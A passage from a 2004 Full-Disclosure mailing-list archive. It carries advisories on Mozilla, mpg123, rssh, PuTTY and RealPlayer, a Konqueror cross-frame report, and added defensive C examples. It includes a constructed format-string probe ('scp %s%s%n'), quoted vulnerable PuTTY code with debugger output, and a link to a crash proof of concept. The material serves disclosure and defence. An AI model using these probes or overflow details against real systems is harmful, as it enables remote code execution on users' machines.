17a567dc4151929cd998fa145631a939edb658ea redhat/9/updates/i386/mozilla-chat-1.4.3-0.9.1.legacy.i386.rpm
c94427f671fc72f3198c3947feb1a55e14cb285f redhat/9/updates/i386/mozilla-devel-1.4.3-0.9.1.legacy.i386.rpm
a11eecf474c891edcc64dcb07e85ffef0af17b42 redhat/9/updates/i386/mozilla-dom-inspector-1.4.3-0.9.1.legacy.i386.rpm
eff086a513ad6a62c64e0f5875c8407e706360ed redhat/9/updates/i386/mozilla-js-debugger-1.4.3-0.9.1.legacy.i386.rpm
f11ac30cfc4ef65c0670c381f47b69a342e4db22 redhat/9/updates/i386/mozilla-mail-1.4.3-0.9.1.legacy.i386.rpm
1b69070ca96ef10c60ce7fdb115b730bdf17a5ca redhat/9/updates/i386/mozilla-nspr-1.4.3-0.9.1.legacy.i386.rpm
aa8c04f0b2d3cefed5222c2940240ecfc3780315 redhat/9/updates/i386/mozilla-nspr-devel-1.4.3-0.9.1.legacy.i386.rpm
5cf1c268091e7b88732e8efa58d48cf225e70800 redhat/9/updates/i386/mozilla-nss-1.4.3-0.9.1.legacy.i386.rpm
6911b2dc76ef48c309c425bd2b8d620941b5c023 redhat/9/updates/i386/mozilla-nss-devel-1.4.3-0.9.1.legacy.i386.rpm
d99fb9b15188b9d58ad67051cd3e3468ac02681c redhat/9/updates/i386/galeon-1.2.13-0.9.2.legacy.i386.rpm

861196199b25fe56d2f2d990c4eb74fad537a643 fedora/1/updates/SRPMS/mozilla-1.4.3-1.fc1.1.legacy.src.rpm
8dd0c2479974060a9b4c64e7fb7bb7bfe08bfca0 fedora/1/updates/SRPMS/epiphany-1.0.4-2.4.legacy.src.rpm
346049a0d8835253ee9f97249b0ac834cb664bfc fedora/1/updates/i386/mozilla-1.4.3-1.fc1.1.legacy.i386.rpm
4898da95488b5fbb6962613c383f42faaf5ff4ba fedora/1/updates/i386/mozilla-chat-1.4.3-1.fc1.1.legacy.i386.rpm
edc0eeeaf12cc95c4838375c61140c0a12df423b fedora/1/updates/i386/mozilla-devel-1.4.3-1.fc1.1.legacy.i386.rpm
871e5ea09920d2844acd74188202c5f99b177bc9 fedora/1/updates/i386/mozilla-dom-inspector-1.4.3-1.fc1.1.legacy.i386.rpm
75d8796d1e902fa56fc8665850a7027d189bd809 fedora/1/updates/i386/mozilla-js-debugger-1.4.3-1.fc1.1.legacy.i386.rpm
08a55541cc0062892b4ae7e11f12ea041dfdc5c2 fedora/1/updates/i386/mozilla-mail-1.4.3-1.fc1.1.legacy.i386.rpm
a00c8f63b2ac924794e533582adecd979ca5aebb fedora/1/updates/i386/mozilla-nspr-1.4.3-1.fc1.1.legacy.i386.rpm
a3e31f50a30ce3bb9d280bbcd0a941c2910534bd fedora/1/updates/i386/mozilla-nspr-devel-1.4.3-1.fc1.1.legacy.i386.rpm
df50478720c9430b1e9edbcd96323db6bf15c48b fedora/1/updates/i386/mozilla-nss-1.4.3-1.fc1.1.legacy.i386.rpm
ebefb845a937bca2c0655f5dd6d43bdf9759a871 fedora/1/updates/i386/mozilla-nss-devel-1.4.3-1.fc1.1.legacy.i386.rpm
5885ec55134e6bffe7be6e0ec527b668e1f8b262 fedora/1/updates/i386/epiphany-1.0.4-2.4.legacy.i386.rpm

These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

https://rhn.redhat.com/errata/RHSA-2004-110.html
https://rhn.redhat.com/errata/RHSA-2004-383.html
https://rhn.redhat.com/errata/RHSA-2004-486.html

9. Contact:

The Fedora Legacy security contact is <secnoticefedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBf2e/YzuFKFF44qURAq4qAJ9okIiXwWsr0VPLkEJj/NNWGb0E5QCeL4Qn
h5npZKWfNiMyG8smV2O/80I=
=63gc
-----END PGP SIGNATURE-----

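The cookie path flaw the Fedora Legacy advisory above describes under CAN-2003-0594 comes down to the browser matching the cookie's path against the raw request URL before `/../` segments and percent-escapes have been resolved. The C function below is an added example written for this page, not code from Mozilla, Apache or Fedora Legacy: it percent-decodes and canonicalises the request path first, treats an embedded NUL (the `%00` trick the same advisory notes under CAN-2004-0760) or a path that climbs above `/` as "no match", and only then applies the usual prefix rule. The function names and the sample paths in `main` are this example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Value of a hex digit, or -1 if c is not one. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode %XX escapes into dst.  Returns 0 on a malformed escape, an embedded
 * NUL (%00) or overflow of dst, so the caller treats the path as no match. */
static int percent_decode(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    for (; *src; src++) {
        int c = (unsigned char)*src;
        if (c == '%') {
            int hi = hexval((unsigned char)src[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[2]);
            if (hi < 0 || lo < 0) return 0;
            c = hi * 16 + lo;
            src += 2;
        }
        if (c == 0 || o + 1 >= dstlen) return 0;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return 1;
}

/* Canonicalise an absolute path: drop empty and "." segments, resolve "..".
 * Returns 0 if the path is not absolute or ".." would climb above "/". */
static int normalize_path(const char *in, char *out, size_t outlen)
{
    size_t pos = 0, inlen = strlen(in);
    const char *p = in;
    if (*p != '/' || outlen < 2) return 0;
    out[pos++] = '/';
    p++;
    while (*p) {
        const char *seg = p;
        size_t seglen = 0;
        while (p[seglen] && p[seglen] != '/') seglen++;
        p += seglen;
        if (*p == '/') p++;
        if (seglen == 0 || (seglen == 1 && seg[0] == '.'))
            continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            if (pos <= 1) return 0;                  /* would escape the root */
            pos--;                                   /* drop the last segment's '/' */
            while (pos > 0 && out[pos - 1] != '/') pos--;
            continue;
        }
        if (pos + seglen + 2 > outlen) return 0;
        memcpy(out + pos, seg, seglen);
        pos += seglen;
        out[pos++] = '/';
    }
    if (pos > 1 && in[inlen - 1] != '/') pos--;      /* keep trailing '/' only if given */
    out[pos] = '\0';
    return 1;
}

/* Path-match on the canonical request path: equal, or the cookie path is a
 * prefix that ends on a '/' boundary.  Anything undecodable is "no match". */
int cookie_path_matches(const char *cookie_path, const char *request_path)
{
    char decoded[1024], canon[1024];
    size_t n = strlen(cookie_path);
    if (n == 0 || cookie_path[0] != '/') return 0;
    if (!percent_decode(request_path, decoded, sizeof decoded)) return 0;
    if (!normalize_path(decoded, canon, sizeof canon)) return 0;
    if (strncmp(canon, cookie_path, n) != 0) return 0;
    return canon[n] == '\0' || canon[n] == '/' || cookie_path[n - 1] == '/';
}

int main(void)
{
    /* constructed probe paths against a cookie scoped to /secure */
    const char *probes[] = { "/secure/login", "/secure/../public/login",
                             "/public/../secure/login", "/secure/%2e%2e/public" };
    for (size_t i = 0; i < sizeof probes / sizeof *probes; i++)
        printf("%-28s -> %s\n", probes[i],
               cookie_path_matches("/secure", probes[i]) ? "send cookie" : "withhold");
    return 0;
}
```

Decoding before canonicalising is what defeats the "character encoding" variant: `%2e%2e%2f` only turns into a traversal once it has been decoded, and a matcher that normalises the raw string never sees it.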


 
[Full-Disclosure] [ GLSA 200410-27 ] mpg123: Buffer overflow vulnerabilities

From: Kurt Lieber (kliebergentoo.org)
Date: Wed Oct 27 2004 - 07:26:04 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-27
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: mpg123: Buffer overflow vulnerabilities
      Date: October 27, 2004
      Bugs: #68343
        ID: 200410-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Buffer overflow vulnerabilities have been found in mpg123 which could
lead to execution of arbitrary code.

Background
==========

mpg123 is an MPEG Audio Player.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-sound/mpg123 < 0.59s-r5 >= 0.59s-r5

Description
===========

Buffer overflow vulnerabilities in the getauthfromURL() and http_open()
functions have been reported by Carlos Barros. Additionally, the Gentoo
Linux Sound Team fixed additional boundary checks which were found to
be lacking.

Impact
======

By enticing a user to open a malicious playlist or URL or making use of
a specially-crafted symlink, an attacker could possibly execute
arbitrary code with the rights of the user running mpg123.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All mpg123 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/mpg123-0.59s-r5"

References
==========

  [ 1 ] Security Advisory by Carlos Barros
        http://www.barrossecurity.com/advisories/mpg123_getauthfromurl_bof_advisory.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-27.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFBf5PcJPpRNiftIEYRAr7CAKCHosFiP2R8iYKuRmhk3KvJYxOehACeOPso
mfv9QmRfMccHTl48sznuFso=
=XPwo
-----END PGP SIGNATURE-----



 
[Full-Disclosure] KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Yanosz (yanoszgmx.net)
Date: Wed Oct 27 2004 - 08:45:21 CDT


Package: Konqueror
Version: 3.2.2-1 (sarge)
Severity: Important

In contrast to other browsers like Firefox, Konqueror allows JavaScript to
access other frames in a frameset that were loaded from a different (sub)domain.
In this way enclosed / secret data can be read through a hidden frameset.
See http://groenndemon.de/bla for a demonstration.

(I'd also like to thank the webmaster for motivating me to explore this issue
and setting up a webpage for demonstration)

(Translation: Action Ändern -> Change action
Passwort klauen -> steal password
Abschicken -> submit)

Please verify this issue on other versions - 3.1.4 seems to be affected as
well.

Keep smiling
yanosz



 
[Full-Disclosure] Re: KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Yanosz (yanoszgmx.net)
Date: Wed Oct 27 2004 - 08:51:49 CDT


Greetings,

sorry, I forgot to mention that the hole is fixed in Konqueror v 3.2.3 but
probably still not fixed in stable. (2.2.2)

So table



 
[Full-Disclosure] Re: Bug#278518: KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Adeodato Simó (asp16alu.ua.es)
Date: Wed Oct 27 2004 - 09:00:07 CDT


* Yanosz [Wed, 27 Oct 2004 15:45:21 +0200]:
> Package: Konqueror
> Version: 3.2.2-1 (sarge)
> Severity: Important

> In contrast to other browsers like firefox, Konqueror allows JavaScript to
> access other frames in a frameset, loaded with from different (sub)domain. By
> that enclosed / secret data can be read through a hidden frameset.
> See http://groenndemon.de/bla for demonstration.

  please see http://bugs.debian.org/261740. version 3.2.3-1.sarge.1
  (available in testing-proposed-updates) fixed the vulnerability and
  will be included in sarge.

  you can use this version by adding this line to your sources.list:

    deb http://your.mirror.debian.org/debian sarge-proposed-updates main

  thanks,

--
Adeodato Simó
    EM: asp16 [ykwim] alu.ua.es | PK: DA6AE621
 
If there is a sin against life, it consists perhaps not so much in
despairing of life as in hoping for another life and in eluding the
implacable grandeur of this life.
                -- Albert Camus



 
[Full-Disclosure] [ GLSA 200410-28 ] rssh: Format string vulnerability

From: Thierry Carrez (koongentoo.org)
Date: Wed Oct 27 2004 - 10:02:09 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: rssh: Format string vulnerability
      Date: October 27, 2004
      Bugs: #66988
        ID: 200410-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

rssh is vulnerable to a format string vulnerability that allows
arbitrary execution of code with the rights of the connected user,
thereby bypassing rssh restrictions.

Background
==========

rssh is a restricted shell, allowing only a few commands like scp or
sftp. It is often used as a complement to OpenSSH to provide limited
access to users.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-shells/rssh < 2.2.2 >= 2.2.2

Description
===========

Florian Schilhabel from the Gentoo Linux Security Audit Team found a
format string vulnerability in rssh syslogging of failed commands.

Impact
======

Using a malicious command, it may be possible for a remote
authenticated user to execute arbitrary code on the target machine with
user rights, effectively bypassing any restriction of rssh.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All rssh users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-shells/rssh-2.2.2"

References
==========

  [ 1 ] rssh security announcement
        http://www.pizzashack.org/rssh/security.shtml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-28.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

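GLSA 200410-28 above locates the rssh bug in the syslogging of failed commands, which is the classic shape of a format string flaw: the text a user typed is handed to the logger as the format argument instead of as a `%s` parameter. The C below is an added illustration for this page, not rssh's code: it shows the hardened logging call (with `snprintf` standing in for `syslog` so the result can be inspected) beside a small review helper that counts the conversion directives an untrusted string would trigger if it were ever used as a format. The function names and the sample command are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Pattern the advisory describes, shown only as a comment: the untrusted
 * command is the format string, so any %-directive it carries is interpreted.
 *
 *     syslog(LOG_ERR, cmd);
 */

/* Hardened form: the untrusted text is only ever a %s argument.  The same
 * rule applies to syslog itself:
 *     syslog(LOG_ERR, "user %s ran unknown command: %s", user, cmd); */
int log_rejected_command(char *out, size_t outlen,
                         const char *user, const char *cmd)
{
    return snprintf(out, outlen,
                    "rssh: user %s attempted to run unrecognised command: %s",
                    user, cmd);
}

/* Review helper: number of conversion directives an untrusted string would
 * trigger if passed as a format.  "%%" is a literal percent and is skipped.
 * Handy when auditing inputs or log lines for format-string probes. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        n++;
    }
    return n;
}

int main(void)
{
    char line[160];
    const char *cmd = "scp %s%s%n";          /* constructed hostile input */
    log_rejected_command(line, sizeof line, "alice", cmd);
    printf("%s\n", line);                    /* directives survive as literal text */
    printf("directives in input: %d\n", count_format_directives(cmd));
    return 0;
}
```

Compilers flag the dangerous form when asked (`-Wformat-security` in GCC and Clang warns on a non-literal format with no arguments), which is the cheapest way to catch this class of bug in a code base the size of rssh.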



 
[Full-Disclosure] Re: Bug#278518: KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Yanosz (yanoszgmx.net)
Date: Wed Oct 27 2004 - 10:20:28 CDT


Greetings,...

On Wednesday, 27 October 2004 16:00, Adeodato Simó wrote:
> * Yanosz [Wed, 27 Oct 2004 15:45:21 +0200]:
> > Package: Konqueror
> > Version: 3.2.2-1 (sarge)
> > Severity: Important
> >
> > In contrast to other browsers like firefox, Konqueror allows JavaScript
> > to access other frames in a frameset, loaded with from different
> > (sub)domain. By that enclosed / secret data can be read through a hidden
> > frameset. See http://groenndemon.de/bla for demonstration.
>
> please see http://bugs.debian.org/261740. version 3.2.3-1.sarge.1
> (available in testing-proposed-updates) fixed the vulnerability and
> will be included in sarge.

Ooops. Sorry.
Is stable affected as well?

Keep smiling
yanosz



 
[Full-Disclosure] Crashes in Master of Orion III 1.2.5

From: Luigi Auriemma (aluigiautistici.org)
Date: Wed Oct 27 2004 - 13:45:00 CDT


#######################################################################

                             Luigi Auriemma

Application: Master of Orion III
              http://moo3.quicksilver.com
Versions: <= 1.2.5
Platforms: Windows and MacOS
Bugs: - allocation error
              - big nicknames crash
Exploitation: remote, versus server
Date: 27 October 2004
Author: Luigi Auriemma
              e-mail: aluigialtervista.org
              web: http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Master of Orion III is a space strategy game developed by Quicksilver
(http://www.quicksilver.com) and released in February 2003.

#######################################################################

=======
2) Bugs
=======

-------------------
A] allocation error
-------------------

Each data block exchanged between clients and server is preceded by a
32-bit number specifying its size.
The game automatically allocates that amount of data, and if it is
too big to be allocated, the game simply exits.

----------------------
B] big nicknames crash
----------------------

The game uses some anti buffer-overflow protections, but if an attacker
makes multiple consecutive connections (between 1 and 10, it varies)
using big nicknames, the game crashes.

#######################################################################

===========
3) The Code
===========

http://aluigi.altervista.org/poc/moo3boom.zip

#######################################################################

======
4) Fix
======

No fix.
Developers will not fix this problem unless there are significant
incidents reported.

#######################################################################

---
Luigi Auriemma
http://aluigi.altervista.org



 
[Full-Disclosure] iDEFENSE Security Advisory 10.27.04: PuTTY SSH2_MSG_DEBUG Buffer Overflow Vulnerability

idlabs-advisoriesidefense.com
Date: Wed Oct 27 2004 - 11:34:45 CDT


PuTTY SSH2_MSG_DEBUG Buffer Overflow Vulnerability

iDEFENSE Security Advisory 10.27.04
www.idefense.com/application/poi/display?id=155&type=vulnerabilities
October 27, 2004

I. BACKGROUND

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix
platforms, along with an xterm terminal emulator.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Simon Tatham's
PuTTY can allow attackers to execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds
checking on SSH2_MSG_DEBUG packets. The 'stringlen' parameter is given a
user-supplied value by reading in an integer from an offset in the
packet data. The 'stringlen' value is incorrectly checked due to
signedness issues as seen below.

-- snip --
static int ssh2_rdpkt(Ssh ssh, unsigned char **data, int *datalen)
{
    struct rdpkt2_state_tag *st = &ssh->rdpkt2_state;
    ...
    switch (ssh->pktin.type) {
        ...
      case SSH2_MSG_DEBUG:
        {
            char buf[512];
            int stringlen = GET_32BIT(ssh->pktin.data+7);
            int prefix;
            strcpy(buf, "Remote debug message: ");
            prefix = strlen(buf);
            if (stringlen > (int)(sizeof(buf)-prefix-1))
                stringlen = sizeof(buf)-prefix-1;
[!]         memcpy(buf + prefix,
                   ssh->pktin.data + 11, stringlen);
            buf[prefix + stringlen] = '\0';
            logevent(buf);
        }
-- snip --

The following debugger output shows successful control of program
execution:

EAX CC004019
ECX 00401909 putty.00401909
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 00129FC8
EBP 00129FDC
ESI 0012A0A4
EDI 7C9037BF ntdll.7C9037BF
EIP 0012FFBA

SEH chain of main thread
Address SE handler
0012FFB0 putty.00401905

Log data, item 0
 Address=0012FFB9
 Message=INT3 command at 0012FFB9

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under the
privileges of the user running PuTTY. The client must be directed to
connect to a malicious server in order to trigger the vulnerability.

IV. DETECTION

iDEFENSE has confirmed that PuTTY 0.55 is vulnerable.

V. WORKAROUND

An alternate SSH client can be used to connect to untrusted hosts.

VI. VENDOR RESPONSE

PuTTY 0.56 addresses this problem and is available for download at:

   http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

10/21/2004 Initial vendor notification
10/21/2004 iDEFENSE clients notified
10/22/2004 Initial vendor response
10/27/2004 Public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this
vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Hugo van der Kooij (hvdkooij@vanderkooij.org)
Date: Wed Oct 27 2004 - 15:13:04 CDT


On Wed, 27 Oct 2004, Elia Florio wrote:

> Of course, I'd like to support the Clam team....they're working
> hard for a valuable open-source AV and I appreciate this too!
> I can send to them my reports (extracted from virustotal.com) and
> the undetected files (exe,dll,class,javascript,html) with
> malware/trojan and exploits taken from "xpire.info".
>
> Where do I send this archive? What's the mail address?
> Must I use a PGP key or simply a password-protected zip?

The following page should inform you about everything you need to know:
http://clamav.catt.com/cgi-bin/sendvirus.cgi

Hugo.

--
        I hate duplicates. Just reply to the relevant mailinglist.
        hvdkooij@vanderkooij.org http://hvdkooij.xs4all.nl/
                Don't meddle in the affairs of magicians,
                for they are subtle and quick to anger.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] EEYE: RealPlayer Zipped Skin File Buffer Overflow

From: Marc Maiffret (mmaiffret@eeye.com)
Date: Wed Oct 27 2004 - 15:40:22 CDT


RealPlayer Zipped Skin File Buffer Overflow

Release Date:
October 27, 2004

Date Reported:
October 11, 2004

Severity:
High (Code Execution)

Vendor:
RealNetworks

Systems Affected:
For Microsoft Windows
RealPlayer 10.5 (6.0.12.1053 and earlier)
RealPlayer 10
RealOne Player v2
RealOne Player v1

Overview:
eEye Digital Security has discovered a vulnerability in RealPlayer that
allows a remote attacker to reliably overwrite the stack with arbitrary
data and execute arbitrary code in the context of the user under which
the player is running.

Technical Details:
A RealPlayer skin file (.rjs extension) can be downloaded and applied
automatically through a web browser without the user's permission. A
skin file is a bundle of graphics and a .ini file, stored together in
ZIP format. DUNZIP32.DLL, which is included with RealPlayer, is used to
extract the contents of the skin file. When an .rjs file containing a
long file name (greater than around 0x8000 bytes) is opened, either in
RealPlayer or through a web browser, a stack based buffer overflow
occurs, allowing an exception handler record to be overwritten and EIP
to be hijacked.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
RealNetworks has released a patch for this vulnerability. The patch is
available via the "Check for Update" menu item under Tools on the
RealPlayer menu bar. "Security Update - Skin File Overflow" Recommended
Player Update: Resolves a security vulnerability when activating a
specifically malformed skins file. Skins files available on RealNetworks
site are examined before being posted. Skins files from other sources
should be treated with caution.

Credit:
Discovery: Yuji Ukai

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/Products/Retina/download.html

Greetings:
TCC, YY, KEN, O.C., GuysShinbashi_Sanuki-Iyo_Place,
GuysNightLandSlotmachinePlayroom

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
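The trigger eEye describes is a member name far longer than an extractor expects inside the ZIP container that an .rjs skin really is. The following is an added example, not eEye's or RealNetworks' code: it walks the local file headers of a ZIP image and reports the largest declared file-name length, so a skin archive can be refused before any extractor copies that name anywhere. The 0x8000 threshold is the figure quoted in the advisory; the header field offsets are those of the ZIP local file header format; the sample archive, the NAME_LIMIT macro and the demo_* wrappers are constructed for this demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not eEye's or RealNetworks' code: an .rjs skin is a ZIP
 * archive, and the advisory says a member name longer than about 0x8000
 * bytes overflows a stack buffer in DUNZIP32.DLL.  This walks the local
 * file headers of a ZIP image and reports the largest declared name length
 * so such an archive can be refused before an extractor touches it.  The
 * 0x8000 threshold is the advisory's figure; the sample archive below is
 * constructed for the demo. */

#define ZIP_LOCAL_SIG 0x04034b50u
#define ZIP_LOCAL_HDR 30u        /* fixed part of a local file header */
#define NAME_LIMIT    0x8000u    /* figure quoted in the advisory */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Largest file-name length declared by any local file header, or 0 if the
 * image does not start with one.  Walks entries by their declared sizes and
 * stops at the central directory, at a truncated entry, or at an entry that
 * uses a data descriptor (its size is not known without inflating). */
uint32_t zip_max_name_len(const uint8_t *buf, size_t len)
{
    size_t off = 0;
    uint32_t worst = 0;
    while (len - off >= ZIP_LOCAL_HDR && rd32(buf + off) == ZIP_LOCAL_SIG) {
        const uint8_t *h = buf + off;
        uint16_t flags = rd16(h + 6);
        uint32_t csize = rd32(h + 18);
        uint16_t nlen  = rd16(h + 26);
        uint16_t xlen  = rd16(h + 28);
        if (nlen > worst) worst = nlen;          /* declared, not actual */
        if (flags & 0x0008) break;               /* data descriptor follows */
        size_t next = off + ZIP_LOCAL_HDR + nlen + xlen;
        if (next > len || csize > len - next) break;   /* truncated entry */
        off = next + csize;
    }
    return worst;
}

/* Policy: refuse an archive whose declared name length reaches NAME_LIMIT. */
int zip_name_too_long(const uint8_t *buf, size_t len)
{
    return zip_max_name_len(buf, len) >= NAME_LIMIT;
}

/* Constructed sample: one stored (method 0) entry whose name is name_len
 * bytes of 'A' followed by a one-byte payload.  Returns bytes written, or
 * 0 if cap is too small. */
size_t build_sample_zip(uint8_t *out, size_t cap, uint16_t name_len)
{
    size_t need = ZIP_LOCAL_HDR + name_len + 1;
    if (need > cap) return 0;
    memset(out, 0, ZIP_LOCAL_HDR);
    wr32(out + 0, ZIP_LOCAL_SIG);
    wr16(out + 4, 20);               /* version needed to extract */
    wr32(out + 18, 1);               /* compressed size */
    wr32(out + 22, 1);               /* uncompressed size */
    wr16(out + 26, name_len);        /* file name length */
    memset(out + ZIP_LOCAL_HDR, 'A', name_len);
    out[ZIP_LOCAL_HDR + name_len] = 'x';
    return need;
}

/* Wrappers that build the sample archive and run the check on it. */
uint32_t demo_max_name_len(uint16_t name_len)
{
    static uint8_t img[0xA000];
    size_t n = build_sample_zip(img, sizeof img, name_len);
    return zip_max_name_len(img, n);
}

int demo_refused(uint16_t name_len)
{
    static uint8_t img[0xA000];
    size_t n = build_sample_zip(img, sizeof img, name_len);
    return zip_name_too_long(img, n);
}

int main(void)
{
    printf("8-byte name:      max %u, refused %d\n",
           demo_max_name_len(8), demo_refused(8));
    printf("0x9000-byte name: max %u, refused %d\n",
           demo_max_name_len(0x9000), demo_refused(0x9000));
    return 0;
}
```

The check deliberately records the declared length, not the bytes actually present: a truncated archive that claims a 0x9000-byte name is still refused, because the declared field is what a naive extractor trusts when it sizes its copy.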


 
[Full-Disclosure] [ GLSA 200410-29 ] PuTTY: Pre-authentication buffer overflow

From: Sune Kloppenborg Jeppesen (jaervosz@gentoo.org)
Date: Wed Oct 27 2004 - 16:47:43 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-29
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: PuTTY: Pre-authentication buffer overflow
      Date: October 27, 2004
      Bugs: #69123
        ID: 200410-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

PuTTY contains a vulnerability allowing an SSH server to execute
arbitrary code on the connecting client.

Background
==========

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix
platforms, along with an xterm terminal emulator.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/putty            <= 0.55                         >= 0.56

Description
===========

PuTTY fails to do proper bounds checking on SSH2_MSG_DEBUG packets. The
"stringlen" parameter value is incorrectly checked due to signedness
issues. Note that this vulnerability is similar to the one described in
GLSA 200408-04 but not the same.

Impact
======

